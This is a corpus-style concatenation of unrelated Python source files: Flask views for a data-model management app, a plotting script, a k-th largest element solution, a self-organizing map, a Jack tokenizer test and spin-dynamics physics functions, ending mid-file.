model_props=model_props)\r\n\r\n\r\n@bpapp.route('/m//_details', methods=['GET'])\r\ndef _model_details(model_id):\r\n\r\n # model = Model.objects.only('Oid').get_or_404(id=model_id).head_object\r\n model = Model.objects.get_or_404(id=model_id)\r\n Formdata = namedtuple(\"timeline\",\r\n \"id oid name last_modified\")\r\n form = Formdata(\r\n id=model.id,\r\n oid=model.Oid,\r\n name=model.name,\r\n last_modified=model.modified\r\n )\r\n return render_template(\r\n 'model_mgmt/_model_details.htm.j2', form=form, project_id=model.prjId, model=model)\r\n\r\n\r\n@bpapp.route('/m//_export', methods=['GET'])\r\ndef _model_export(model_id):\r\n\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n return render_template(\r\n 'model_mgmt/_model_export.htm.j2', model=model)\r\n\r\n\r\n@bpapp.route('/m//_delete', methods=['GET'])\r\ndef _model_delete(model_id):\r\n model = Model.head_objects.get_or_404(id=model_id)\r\n model.delete()\r\n\r\n flash_success('모델이 성공적으로 삭제되었습니다.')\r\n return redirect(url_for('model_mgmt._model_property', project_id=model.project.id))\r\n\r\n\r\n@bpapp.route('/p//m_prefvl', methods=['GET', 'POST'])\r\ndef _model_version_lock(project_id):\r\n\r\n project = Project.objects.get_or_404(id=project_id)\r\n project_user = ProjectUser.objects(project=project, user=current_user._get_current_object()).get_or_404()\r\n\r\n models = Model.head_objects.filter(prjId=project_id).order_by('name')\r\n Formdata = namedtuple(\"timeline\",\r\n \"id oid name last_modified\")\r\n forms = []\r\n for model in models:\r\n if project_user.can_manage_all_models or model.root_object in project_user.manageable_models:\r\n pass\r\n else:\r\n continue\r\n\r\n temporary_form = Formdata(\r\n id=model.id,\r\n oid=model.Oid,\r\n name=model.name,\r\n last_modified=model.modified\r\n )\r\n forms.append(temporary_form)\r\n\r\n project = Project.objects.get_or_404(id=project_id)\r\n\r\n from ercc.ercc_bps.api.v1.btstptbl import ProjectModelHistoryResource\r\n history_resource = ProjectModelHistoryResource()\r\n\r\n yesterday = datetime.today() - timedelta(1)\r\n history = history_resource.get_history_list(project_id=project_id, date_from=yesterday)\r\n\r\n yesterday_model_map = {}\r\n\r\n for model in history:\r\n entity_count = 0\r\n for dtl in model[\"dtl\"]:\r\n if \"object_type\" in dtl and dtl[\"object_type\"] == \"entity\":\r\n entity_count += 1\r\n previous_count = yesterday_model_map[model[\"model_name\"]][\"modified_entities_count\"] \\\r\n if model[\"model_name\"] in yesterday_model_map else 0\r\n\r\n yesterday_model_map[model[\"model_name\"]] = \\\r\n {\"name\": model[\"model_name\"], \"modified_entities_count\": previous_count + entity_count}\r\n\r\n yesterday_models = [\r\n v for k, v in yesterday_model_map.items()\r\n ]\r\n\r\n return render_template('model_mgmt/_model_timeline.html',\r\n project=project, forms=forms, yesterday_models=yesterday_models)\r\n\r\n\r\n@bpapp.route('/getModelTimeline/', methods=['POST', 'GET'])\r\ndef get_model_timeline(project_id):\r\n prjId = str(request.json['project_id'])\r\n mdlOId = str(request.json['model_oid'])\r\n userId = current_user.to_dbref().id\r\n\r\n timeline = ercDataModel.get_model_timeline(prjId, mdlOId, userId)\r\n lock = ercDataModel.get_model_timeline_lock(prjId, mdlOId, userId)\r\n result = {\r\n \"timeline\": timeline,\r\n \"lock\": lock\r\n }\r\n return dumps(result, ensure_ascii=False)\r\n\r\n\r\n@bpapp.route('/getModelTimelineDetail/', methods=['POST', 'GET'])\r\ndef get_model_timeline_detail(project_id):\r\n prjId = str(request.json['project_id'])\r\n mdlOId = str(request.json['model_oid'])\r\n # userId = current_user.to_dbref().id\r\n\r\n models = Model.objects.filter(prjId=prjId, Oid=ObjectId(mdlOId)).order_by('modified').limit(200)\r\n return render_template('model_mgmt/_model_timeline_detail.html', models=models)\r\n\r\n\r\n@bpapp.route('/timelineRemoveLock/', methods=['POST', 'GET'])\r\ndef timeline_remove_lock(project_id):\r\n prjId = str(request.json['project_id'])\r\n mdlOId = str(request.json['mdlOId'])\r\n lockType = str(request.json['lockType'])\r\n # userId = current_user.to_dbref().id\r\n lockUserId = str(request.json['userId'])\r\n\r\n result = ercDataModel.release_lock(prjId, lockUserId, lockType, mdlOId, \"\")\r\n return dumps(result, ensure_ascii=False)\r\n\r\n\r\n@bpapp.route('/e/')\r\n@bpapp.route('/e//view')\r\ndef entity_viewer(entity_id):\r\n return render_template(\r\n 'project/portlets.htm.j2',\r\n active_page='report',\r\n portlets=[\r\n Portlet('model_mgmt._entity_viewer', entity_id=entity_id),\r\n # Portlet('erc._entities', model_id=g.entity.model.id)\r\n ]\r\n )\r\n\r\n\r\n@bpapp.route('/m/')\r\n@bpapp.route('/m//view')\r\ndef model_viewer(model_id):\r\n return render_template(\r\n 'project/portlets.htm.j2',\r\n active_page='model_mgmt',\r\n portlets=[\r\n # Portlet('model_mgmt._model_tools', model_id=model_id),\r\n Portlet('model_mgmt._entities', model_id=model_id)\r\n ]\r\n )\r\n\r\n\r\n@bpapp.route('/s/')\r\n@bpapp.route('/s//view')\r\ndef subjectarea_viewer(subjectarea_id):\r\n return render_template(\r\n 'project/portlets.htm.j2',\r\n active_page='model_mgmt',\r\n portlets=[\r\n # Portlet('model_mgmt._model_tools', model_id=model_id),\r\n Portlet('model_mgmt._entities', subjectarea_id=subjectarea_id)\r\n ]\r\n )\r\n\r\n\r\n@bpapp.route('/s//_view')\r\ndef _subjectarea_viewer(subjectarea_id):\r\n return redirect(url_for('model_mgmt._entities', subjectarea_id=subjectarea_id))\r\n\r\n\r\n@bpapp.route('/m//_view')\r\ndef _model_viewer(model_id):\r\n return redirect(url_for('model_mgmt._entities', model_id=model_id))\r\n # return render_template(\r\n # 'project/portlets.htm.j2',\r\n # active_page='report',\r\n # portlets=[\r\n # # Portlet('model_mgmt._model_tools', model_id=model_id),\r\n # Portlet('erc._entities', model_id=model_id)\r\n # ]\r\n # )\r\n\r\n\r\n@bpapp.route('/e//_view')\r\n@bpapp.route('/e//_view///')\r\ndef _entity_viewer(entity_id, action='default', table_typ='L'):\r\n \"\"\"\r\n 엔티티 속성에 대한 검토랑 수행\r\n \"\"\"\r\n entity = g.entity\r\n if action == 'glossary_test':\r\n entity.glossary_integrity_check(rewrite=True)\r\n elif action == 'glossary_run':\r\n entity.glossary_integrity_change()\r\n elif action == 'glossary_run_exception':\r\n entity.set_to_glossary_skipped()\r\n entity.save()\r\n elif action == 'schema_test':\r\n entity.schema_integrity_check(rewrite=True)\r\n entity.inspect_qa()\r\n elif action == 'schema_run':\r\n entity.schema_integrity_check(commit=False)\r\n entity.schema_integrity_change(\r\n rewrite=True, # 기존검사결과 덮어씌우기\r\n recreate=False # merge, 스키마기준으로 새로 생성하지 않음\r\n )\r\n entity.inspect_qa()\r\n\r\n if table_typ == 'L':\r\n entity.attrs.sort(key=lambda x: int(x['Lattr']['Order']))\r\n else:\r\n entity.attrs.sort(key=lambda x: int(x['Pattr']['Physical_Order']))\r\n\r\n return render_template(\r\n 'model_mgmt/entity_viewer.htm.j2',\r\n project_group=g.project_group,\r\n entity=entity,\r\n table_typ=table_typ,\r\n action=action)\r\n\r\n\r\n@bpapp.route('/e//_history')\r\ndef _entity_history(entity_id, type='json'):\r\n\r\n # history는 항상 최신 기준으로\r\n entity = g.entity.head_object\r\n\r\n # def _format(obj, indent=1):\r\n # if isinstance(obj, list):\r\n # htmls = []\r\n # for k in obj:\r\n # htmls.append(_format(k, indent + 1))\r\n # return '[
%s
]' % (indent, ',
'.join(htmls))\r\n # if isinstance(obj, dict):\r\n # htmls = []\r\n # for k, v in obj.items():\r\n # htmls.append(\"%s: %s\" % (k, _format(v, indent + 1)))\r\n # return '{
%s
}' % (indent, ',
'.join(htmls))\r\n # return str(obj)\r\n\r\n # 교집합에서 id는 같은데 내용이 다른 것만 추출\r\n def _attr2singleline(attr):\r\n attrnm = attr.get(\"Lattr\", {}).get('attrNm', '')\r\n order = attr.get(\"Lattr\", {}).get('Order', '')\r\n pk = '(pk) ' if attr.get(\"Lattr\", {}).get('PKYN', '') else ''\r\n colnm = attr.get(\"Pattr\", {}).get('colNm', '')\r\n porder = attr.get(\"Pattr\", {}).get('Physical_Order', '')\r\n null = '' if attr.get(\"Lattr\", {}).get('nullYN', '') else 'NOTNULL'\r\n dataTyp = attr.get(\"Pattr\", {}).get('dataTyp', '')\r\n defaultVal = attr.get(\"Pattr\", {}).get('defaultVal', '')\r\n return f'{pk}{attrnm} {colnm} {dataTyp} {defaultVal} {null} -- order:{order}, physical_order:{porder}'\r\n\r\n diff_a_id = request.args.get('diff_a')\r\n diff_b_id = request.args.get('diff_b')\r\n added = None\r\n deleted = None\r\n changed = None\r\n if diff_a_id and diff_b_id:\r\n diff_a = Entity.objects(id=diff_a_id).first()\r\n diff_b = Entity.objects(id=diff_b_id).first()\r\n if diff_a and diff_b:\r\n if diff_a.version < diff_b.version:\r\n diff_a, diff_b = diff_b, diff_a\r\n # diff = difflib.HtmlDiff()\r\n # diff_table = diff.make_table(\r\n # sorted([f'{e.entNm}' for e in diff_b.queryset_entity]),\r\n # sorted([f'{e.entNm}' for e in diff_a.queryset_entity]),\r\n # fromdesc=f'version-{diff_b.version}',\r\n # todesc=f'version-{diff_a.version}',\r\n # context=True,\r\n # numlines=0,\r\n # )\r\n\r\n # unwrap from mongoengine-dict\r\n diff_a_attrs = list(dict(d) for d in diff_a.attrs)\r\n diff_b_attrs = list(dict(d) for d in diff_b.attrs)\r\n\r\n # id로 비교해야 added/deleted를 판단할 수 있다.\r\n added = [\r\n _attr2singleline(a)\r\n for a in diff_b_attrs if a.get('id') in (\r\n set(a.get('id') for a in diff_b_attrs if a.get('id')) - set(a.get('id') for a in diff_a_attrs if a.get('id'))\r\n )\r\n ]\r\n deleted = [\r\n _attr2singleline(a)\r\n for a in diff_a_attrs if a.get('id') in (\r\n set(a.get('id') for a in diff_a_attrs if a.get('id')) - set(a.get('id') for a in diff_b_attrs if a.get('id'))\r\n )\r\n ]\r\n\r\n # id는 같은데 id가 다른 것은 changed\r\n same = set(a.get('id') for a in diff_a_attrs if a.get('id')) & set(a.get('id') for a in diff_b_attrs if a.get('id'))\r\n diff_a_attrs = {a.get('id'): a for a in diff_a_attrs if a.get('id') in same}\r\n diff_b_attrs = {a.get('id'): a for a in diff_b_attrs if a.get('id') in same}\r\n\r\n changed = [\r\n (_attr2singleline(diff_b_attrs[aid]), _attr2singleline(diff_a_attrs[aid]))\r\n for aid in same\r\n if _attr2singleline(diff_b_attrs[aid]) != _attr2singleline(diff_a_attrs[aid])\r\n # if (\r\n # diff_a_attrs[aid].get('Lattr') != diff_b_attrs[aid].get('Lattr') or\r\n # diff_a_attrs[aid].get('Pattr') != diff_b_attrs[aid].get('Pattr')\r\n # ) # 내용비교를 이렇게만?\r\n ]\r\n else:\r\n diff_a, diff_b = None, None\r\n return render_template(\r\n 'model_mgmt/entity_history.htm.j2',\r\n diff=(added, deleted, changed),\r\n diff_a=diff_a,\r\n diff_b=diff_b,\r\n entity=entity,\r\n model=entity.model)\r\n\r\n\r\n@bpapp.route('/m//_entities')\r\n@bpapp.route('/s//_entities')\r\ndef _entities(model_id=None, subjectarea_id=None):\r\n if subjectarea_id:\r\n return render_template(\r\n 'model_mgmt/entities.htm.j2',\r\n obj=g.subjectarea,\r\n obj_type='subjectarea',\r\n model_id=model_id,\r\n subjectarea_id=subjectarea_id,\r\n )\r\n else:\r\n return render_template(\r\n 'model_mgmt/entities.htm.j2',\r\n obj=g.model,\r\n obj_type='model',\r\n model_id=model_id,\r\n subjectarea_id=subjectarea_id,\r\n )\r\n\r\n\r\n@bpapp.route('/m//_delete_entities', methods=['DELETE', ])\r\n@bpapp.route('/s//_delete_entities', methods=['DELETE', ])\r\ndef _delete_entities(model_id=None, subjectarea_id=None):\r\n from bson import ObjectId\r\n\r\n if model_id is None:\r\n model = g.subjectarea.model\r\n else:\r\n model = g.model\r\n\r\n # entity\r\n entity_ids = request.json.get('ids', [])\r\n deleted = Entity.head_objects(id__in=[ObjectId(oid) for oid in entity_ids]).update(newest='D')\r\n\r\n # model\r\n for eid in entity_ids:\r\n model.entities.remove(eid)\r\n model.save()\r\n\r\n # subjectarea\r\n for sja in model.queryset_subjectarea.only('entities'):\r\n sja.entities = [\r\n e\r\n for e in sja.entities\r\n if e['id'] not in entity_ids\r\n ]\r\n sja.save()\r\n\r\n return jsonify(deleted=deleted)\r\n","sub_path":"ercc/ercc_bps/model_mgmt/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":31246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"383801977","text":"import matplotlib.pyplot as plt\nfrom scipy import *\nimport numpy as np\t\n\nd = loadtxt(\"dn\")\nd2 = loadtxt(\"dn_U0.5\")\nU = 0.5\nplt.plot(d[:,0],abs(np.array(d[:,1])+1j*np.array(d[:,2])),'-o')\nplt.plot(d2[:,0],abs(np.array(d2[:,1])+1j*np.array(d2[:,2])),'-o')\nplt.ylim(0,1.2)\nplt.savefig(\"nt_Uf%s.eps\"%U,format=\"eps\")\nplt.show()\n","sub_path":"HM_interaction_quench/interaction_quench/Uf_0.5/dn_plot.py","file_name":"dn_plot.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"500470550","text":"\"\"\"\nFind K-th largest element in an array.\nNote\n\nYou can swap elements in the array\nExample\n\nIn array [9,3,2,4,8], the 3th largest element is 4\nChallenge\n\nO(n) time, O(1) space\n\"\"\"\n__author__ = 'Danyang'\n\n\nclass Solution:\n def kthLargestElement(self, k, A):\n \"\"\"\n partial quick sort\n\n :param k: int\n :param A: lst\n :return: int\n \"\"\"\n k = len(A)-k\n return self.find_kth(A, 0, len(A), k)\n\n def find_kth(self, A, i, j, k):\n p = self.pivot(A, i, j)\n if k == p:\n return A[p]\n elif k < p:\n return self.find_kth(A, i, p, k)\n else:\n return self.find_kth(A, p+1, j, k)\n\n def pivot(self, A, i, j):\n p = i\n closed = p\n for ptr in xrange(i, j):\n if A[ptr] < A[p]:\n closed += 1\n A[closed], A[ptr] = A[ptr], A[closed]\n\n A[closed], A[p] = A[p], A[closed]\n return closed\n\nif __name__ == \"__main__\":\n assert Solution().kthLargestElement(10, range(1, 11)) == 1\n\n","sub_path":"Kth Largest Element.py","file_name":"Kth Largest Element.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"456833182","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg as la\n\nfrom util import find\n\ndef som(X, eta, stddev, mapsize, tmax):\n \"\"\"\n\tsom, a visualization method\n \"\"\"\n #--- prepare W ---#\n # W holds 1xd vectors\n # W is a mapsize x mapsize array\n W = np.empty((mapsize, mapsize), np.matrix)\n dim = len(X[0, :])# dimension\n for (idx, w) in enumerate(W):\n tmp = np.empty((mapsize), np.matrix)\n for i in range(0, len(tmp.T)):\n arr = np.random.random_sample(dim)\n tmp[i] = np.matrix(arr)# cast into matrix\n W[idx, :] = tmp\n #--- define gamma function ---#\n def gamma(r_win, r):\n tmp_vec = r_win - r\n return np.exp(- tmp_vec.dot(tmp_vec.T) / (2*stddev))\n #--- update weights ---#\n for x in X:\n # prepare result variable\n scores = np.zeros((9,9))\n for idx, w in enumerate(W):\n for i, u in enumerate(w):\n vec = x - u\n scores[idx, i] = vec * vec.T\n # iswinner => returns coordinates of the winner neuron\n iswinner = scores==np.max(scores)# => returns coordinates\n # update the weight vectors\n for idx, w in enumerate(W):\n for i, u in enumerate(w):\n W[idx, i] += eta * \\\n gamma(np.asarray([idx,i]), \\\n np.asarray(find( iswinner.tolist()))) \\\n * x\n return W\n\ndef computeUmatrix(W):\n umatrix = np.asarray(np.zeros([2*len(W),2*len(W.T)]).tolist())\n for idx, w in enumerate(W):\n for i, u in enumerate(w):\n umatrix[2*idx, 2*i] = la.norm(W[idx, i])\n if idx == len(W)-1:\n idx_n = 0\n else:\n idx_n = idx+1\n if i == len(W.T)-1:\n i_n = 0\n else:\n i_n = i+1\n umatrix[2*idx+1, 2*i] = W[idx, i].dot(W[idx_n, i].T)\n umatrix[2*idx, 2*i+1] = W[idx, i].dot(W[idx, i_n].T)\n for idx, w in enumerate(W):\n for i, u in enumerate(w):\n idx_row = 2*idx+1\n idx_col = 2*i+1\n if idx_row == 2*len(W)-1:\n idx_n = 0\n else:\n idx_n = idx_row+1\n if idx_col == 2*len(W.T)-1:\n i_n = 0\n else:\n i_n = idx_col+1\n umatrix[idx_row, idx_col] = np.average(\\\n [umatrix[idx_row-1, idx_col-1],\\\n umatrix[idx_row-1, i_n],\\\n umatrix[idx_n, idx_col-1],\\\n umatrix[idx_n, i_n]])\n return umatrix\n\nif __name__ == \"__main__\":\n \"\"\"\n test flight of the som implementation\n \"\"\"\n X = np.random.random_sample(size=(2, 4))\n eta = 0.7# rate of study\n stddev = 0.01# gaussian range, standard deviation\n mapsize = 9# the length of one axis\n tmax = 50# study iteration times\n\n W = som(X, eta, stddev, mapsize, tmax)\n plt.imshow(computeUmatrix(W))\n plt.title('weight vectors')\n plt.show()\n","sub_path":"som.py","file_name":"som.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"287443535","text":"from unittest import TestCase\n\nfrom JackTokenizer import JackTokenizer, TokenType, KeywordType\nfrom io import StringIO\n\n\nclass TestJackTokenizer(TestCase):\n\n def test_has_more_tokens(self):\n buf = StringIO(\"\"\"\n /*空文件,没有内容\n */\n /*空文件,当行注释移除*/\n \"\"\")\n tokenizer = JackTokenizer(buf)\n self.assertFalse(tokenizer.has_more_tokens())\n buf = StringIO(\"\"\"\n class Main{ /*空文件,没有内容\n */ }\n \"\"\")\n tokenizer = JackTokenizer(buf)\n self.assertTrue(tokenizer.has_more_tokens())\n\n def test_advance(self):\n buf = StringIO(\"\"\"\n /*空文件,没有内容\n */\n \"\"\")\n tokenizer = JackTokenizer(buf)\n with self.assertRaisesRegex(ValueError, \"has no more tokens.*\"):\n tokenizer.advance()\n buf = StringIO(\"\"\"\n class Main{\n }\n \"\"\")\n tokenizer = JackTokenizer(buf)\n tokenizer.advance()\n\n def test_token_type(self):\n tokenizer = JackTokenizer(\"ArrayTest/Main.jack\")\n tokenizer.advance()\n self.assertEqual(TokenType.keyword, tokenizer.token_type())\n self.assertEqual(tokenizer.keyword(), KeywordType.CLASS)\n tokenizer.advance()\n self.assertEqual(TokenType.identifier, tokenizer.token_type())\n self.assertEqual(tokenizer.identifier(), \"Main\")\n\n tokenizer.advance()\n self.assertEqual(TokenType.symbol, tokenizer.token_type())\n self.assertEqual(tokenizer.symbol(), \"{\")\n\n i = 0\n while tokenizer.has_more_tokens():\n i += 1\n tokenizer.advance()\n if i == 43:\n self.assertEqual(TokenType.integerConstant, tokenizer.token_type())\n self.assertEqual(tokenizer.intVal(), '0')\n if i == 28:\n self.assertEqual(TokenType.stringConstant, tokenizer.token_type())\n self.assertEqual(tokenizer.stringVal(), \"HOW MANY NUMBERS? \")\n","sub_path":"11/test_JackTokenizer.py","file_name":"test_JackTokenizer.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"402627846","text":"import numpy as np\nimport parameters as param\nimport spin_matrices as sp\nfrom scipy import constants as sc\nfrom scipy import linalg as la\nimport f2py_dynamics as fortran_se\nimport matplotlib.pyplot as plt\nimport f2py_cross_effect as fortran_ce\nimport time\n\n\ndef liouville_propagator(num_spins, energies, eigvectors, eigvectors_inv,\n microwave_hamiltonian_init, calculate_relaxation_mat, spin_all):\n \"\"\" Calculate Liouville space propagator.\n \"\"\"\n\n # Pre-allocate propagator\n propagator = np.zeros((int(param.time_step_num), 4 ** num_spins, 4 ** num_spins), dtype=np.complex)\n\n # Calculate variables for original Liouville space relaxation\n p_e = np.tanh(0.5 * param.electron_frequency * (sc.Planck / (sc.Boltzmann * param.temperature)))\n p_n = np.tanh(0.5 * param.freq_nuclear_1 * (sc.Planck / (sc.Boltzmann * param.temperature)))\n gnp = 0.5 * (1 - p_n) * (1 / (1 * param.t1_nuc))\n gnm = 0.5 * (1 + p_n) * (1 / (1 * param.t1_nuc))\n gep = 0.5 * (1 - p_e) * (1 / (1 * param.t1_elec))\n gem = 0.5 * (1 + p_e) * (1 / (1 * param.t1_elec))\n\n # Calculate variables for Mance Liouville space relaxation\n boltzmann_elec = param.electron_frequency * (sc.Planck / (sc.Boltzmann * param.temperature))\n boltzmann_nuc = param.freq_nuclear_1 * (sc.Planck / (sc.Boltzmann * param.temperature))\n\n # spin3_s1_z = spin_all[1]\n\n for count in range(0, int(param.time_step_num)):\n\n # Transform microwave Hamiltonian into time dependent basis\n microwave_hamiltonian = np.matmul(eigvectors_inv[count], np.matmul(microwave_hamiltonian_init,\n eigvectors[count]))\n\n # Calculate total Hamiltonian\n total_hamiltonian = np.diag(energies[count]) + microwave_hamiltonian\n\n # start = time.time()\n # for bench in range(0, int(1E6)):\n # #test = np.matmul(eigvectors_inv[count], np.matmul(spin3_s1_z, eigvectors[count]))\n # # eigvectors_liouville = np.kron(eigvectors[count], eigvectors[count])\n # hamiltonian_liouville = kron_rmat_eye(total_hamiltonian, 2 ** num_spins)\n # print('kron_rmat_eye', (time.time() - start))\n #\n # start = time.time()\n # for bench in range(0, int(1E6)):\n # # test = np.matmul(eigvectors_inv[count], np.matmul(spin3_s1_z, eigvectors[count]))\n # # eigvectors_liouville = np.kron(eigvectors[count], eigvectors[count])\n # hamiltonian_liouville = np.kron(total_hamiltonian, np.eye(4))\n # print('np.kron', (time.time() - start))\n\n # Transform Hilbert space Hamiltonian into Liouville space\n hamiltonian_liouville = kron_rmat_eye(total_hamiltonian, 2 ** num_spins) - \\\n kron_eye_rmat(2 ** num_spins, np.transpose(total_hamiltonian))\n\n # Calculate time dependent Liouville space relaxation matrix\n relax_mat = calculate_relaxation_mat(eigvectors[count], eigvectors_inv[count], gnp, gnm, gep, gem, spin_all)\n\n # Calculate time dependent solid effect origonal Liouville space relaxation matrix using F2PY\n # relax_mat = fortran.solid_effect_dynamics.calculate_relaxation_mat(\n # eigvectors[count], eigvectors_inv[count], np.eye(4), np.eye(16), 16, 4, sp.spin2_s_z, sp.spin2_s_p,\n # sp.spin2_s_m, sp.spin2_i_z, sp.spin2_i_p, sp.spin2_i_m, param.t2_elec, param.t2_nuc, gnp, gnm, gep, gem)\n\n # Calculate time dependent cross effect origonal Liouville space relaxation matrix using F2PY\n # relax_mat = fortran_ce.cross_effect_dynamics.calculate_relaxation_mat(\n # eigvectors[count], eigvectors_inv[count], np.eye(8), np.eye(64), 64, 8, sp.spin3_s1_z, sp.spin3_s1_p,\n # sp.spin3_s1_m, sp.spin3_s2_z, sp.spin3_s2_p, sp.spin3_s2_m, sp.spin3_i_z, sp.spin3_i_p, sp.spin3_i_m,\n # param.t2_elec, param.t2_nuc, gnp, gnm, gep, gem)\n\n # Calculate time dependent cross effect Mance Liouville space relaxation matrix using F2PY\n # relax_mat = fortran_ce.cross_effect_dynamics.calculate_relaxation_mat_mance(\n # eigvectors[count], eigvectors_inv[count], 64, 8, sp.spin3_s1_x, sp.spin3_s1_z,\n # sp.spin3_s2_x, sp.spin3_s2_z, sp.spin3_i_x, sp.spin3_i_z, param.t1_elec, param.t1_nuc, param.t2_elec,\n # param.t2_nuc, boltzmann_elec, boltzmann_nuc)\n\n # Calculate Liouville space eigenvectors\n eigvectors_liouville = np.kron(eigvectors[count], eigvectors[count])\n eigvectors_inv_liouville = np.kron(eigvectors_inv[count], eigvectors_inv[count])\n\n # Calculate Liouville space propagator\n liouvillian = hamiltonian_liouville + 1j * relax_mat\n propagator[count, :] = np.matmul(eigvectors_inv_liouville,\n np.matmul(la.expm(-1j * liouvillian * param.time_step),\n eigvectors_liouville))\n\n # exp_mat = la.expm(-1j * liouvillian * param.time_step)\n # spin1_x = sp.spin1_x\n # spin1_z = sp.spin1_z\n # temp1 = np.real(eigvectors_inv_liouville)\n # temp2 = np.real(exp_mat)\n # temp3 = np.real(eigvectors_liouville)\n start = time.time()\n for bench in range(0, int(1E4)):\n exp_test = la.expm(-1j * liouvillian * param.time_step)\n #test = np.matmul(spin1_x, spin1_z)\n #test = np.matmul(eigvectors_inv[count], np.matmul(spin3_s1_z, eigvectors[count]))\n #propagator[count, :] = np.matmul(eigvectors_inv_liouville, np.matmul(test, eigvectors_liouville))\n #test = np.matmul(temp1, np.matmul(temp2, temp3))\n # eigvectors_liouville = np.kron(eigvectors[count], eigvectors[count])\n #hamiltonian_liouville = kron_rmat_eye(total_hamiltonian, 2 ** num_spins)\n print('la.expm', (time.time() - start))\n\n return propagator\n\n\ndef basis_transform(eigvectors, eigvectors_inv, matrices):\n \"\"\" Transforms basis of inputted list of numpy arrays.\n \"\"\"\n\n matrices_out = np.copy(matrices)\n for count in range(0, len(matrices)):\n matrices_out[count] = np.matmul(eigvectors_inv, np.matmul(matrices[count], eigvectors))\n\n return matrices_out\n\n\ndef density_mat_thermal(hamiltonian_ideal):\n \"\"\" Calculate initial thermal density matrix from Boltzmann factors.\n \"\"\"\n\n # Calculate energies of idealised Hamiltonian\n energies_ideal = np.diag(hamiltonian_ideal)\n\n # Calculate initial Zeeman basis density matrix from Boltzmann factors\n boltzmann_factors = np.zeros(len(hamiltonian_ideal))\n for count in range(0, hamiltonian_ideal.shape[0]):\n boltzmann_factors[count] = np.exp(-(sc.Planck * energies_ideal[count]) / (sc.Boltzmann * param.temperature))\n density_mat = (1/np.sum(boltzmann_factors)) * np.diagflat(boltzmann_factors)\n\n return density_mat\n\n\ndef anisotropy_coefficients(angles):\n \"\"\" Calculate time independent coefficients for electron g-anisotropy.\n \"\"\"\n\n gx = param.electron_frequency * param.gtensor[0]\n gy = param.electron_frequency * param.gtensor[1]\n gz = param.electron_frequency * param.gtensor[2]\n\n ca = np.cos(angles[0])\n cb = np.cos(angles[1])\n cg = np.cos(angles[2])\n sa = np.sin(angles[0])\n sb = np.sin(angles[1])\n sg = np.sin(angles[2])\n\n r11 = ca * cb * cg - sa * sg\n r12 = sa * cb * cg + ca * sg\n r13 = -sb * cg\n r21 = -ca * cb * sg - sa * cg\n r22 = -sa * cb * sg + ca * cg\n r23 = sb * sg\n r31 = ca * sb\n r32 = sa * sb\n r33 = cb\n\n c0 = 1 / 3 * (gx + gy + gz)\n c1 = 2 * np.sqrt(2) / 3 * (gx * r11 * r31 + gy * r12 * r32 + gz * r13 * r33)\n c2 = 2 * np.sqrt(2) / 3 * (gx * r21 * r31 + gy * r22 * r32 + gz * r23 * r33)\n c3 = 1 / 3 * (gx * (r11 ** 2 - r21 ** 2) + gy * (r12 ** 2 - r22 ** 2) + gz * (r13 ** 2 - r23 ** 2))\n c4 = 2 / 3 * (gx * r11 * r21 + gy * r22 * r12 + gz * r13 * r23)\n\n return c0, c1, c2, c3, c4\n\n\ndef anisotropy(c0, c1, c2, c3, c4, time):\n \"\"\" Calculate time dependent electron g-anisotropy.\n \"\"\"\n\n g_anisotropy = c0 + c1 * np.cos(2 * np.pi * param.freq_rotor * time) + \\\n c2 * np.sin(2 * np.pi * param.freq_rotor * time) + \\\n c3 * np.cos(2 * np.pi * param.freq_rotor * time * 2) + \\\n c4 * np.sin(2 * np.pi * param.freq_rotor * time * 2)\n\n return g_anisotropy\n\n\ndef hyperfine(hyperfine_angles, time):\n \"\"\" Calculate time dependent hyperfine, neglecting zy coupling.\n \"\"\"\n\n hyperfine_zz = param.hyperfine_coupling * (-0.5 * (np.sin(hyperfine_angles[1]) ** 2) *\n np.cos(2 * (2 * np.pi * param.freq_rotor * time + hyperfine_angles[2])) +\n np.sqrt(2) * np.sin(hyperfine_angles[1]) *\n np.cos(hyperfine_angles[1]) *\n np.cos(2 * np.pi * param.freq_rotor * time + hyperfine_angles[2]))\n\n hyperfine_zx = param.hyperfine_coupling * (-0.5 * np.sin(hyperfine_angles[1]) * np.cos(hyperfine_angles[1]) *\n np.cos(2 * np.pi * param.freq_rotor * time + hyperfine_angles[2]) -\n (np.sqrt(2) / 4) * (np.sin(hyperfine_angles[1]) ** 2) *\n np.cos(2 * (2 * np.pi * param.freq_rotor * time + hyperfine_angles[2])) +\n (np.sqrt(2) / 4) * (3 * (np.cos(hyperfine_angles[1]) ** 2) - 1))\n\n return hyperfine_zz, hyperfine_zx\n\n\ndef kron_rmat_eye(mat, val):\n \"\"\" Calculates np.kron(mat, np.eye(val)) of square matrix mat\n \"\"\"\n\n n = mat.shape[0]\n out = np.zeros((n, val, n, val), dtype=mat.dtype)\n for i in range(0, val):\n out[:, i, :, i] = mat\n out.shape = (n * val, n * val)\n\n return out\n\n\ndef kron_eye_rmat(val, mat):\n \"\"\" Calculates np.kron(np.eye(val), mat) of square matrix mat\n \"\"\"\n\n n = mat.shape[0]\n out = np.zeros((val, n, val, n), dtype=mat.dtype)\n for i in range(0, val):\n out[i, :, i, :] = mat\n out.shape = (n * val, n * val)\n\n return out\n","sub_path":"Python/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"226116990","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndegree = 3\nknots = (0.0, 0.0, 0.0, 0.0, 0.16666666666666666, 0.333, 0.5, 0.667, 0.833, 1.0, 1.0, 1.0, 1.0)\n\nmDegree = 3\n\nctrlpts = [[5.0, 10.0], [15.0, 25.0], [30.0, 30.0], [45.0, 5.0], [55.0, 5.0], [70.0, 40.0], [60.0, 60.0], [35.0, 60.0], [20.0, 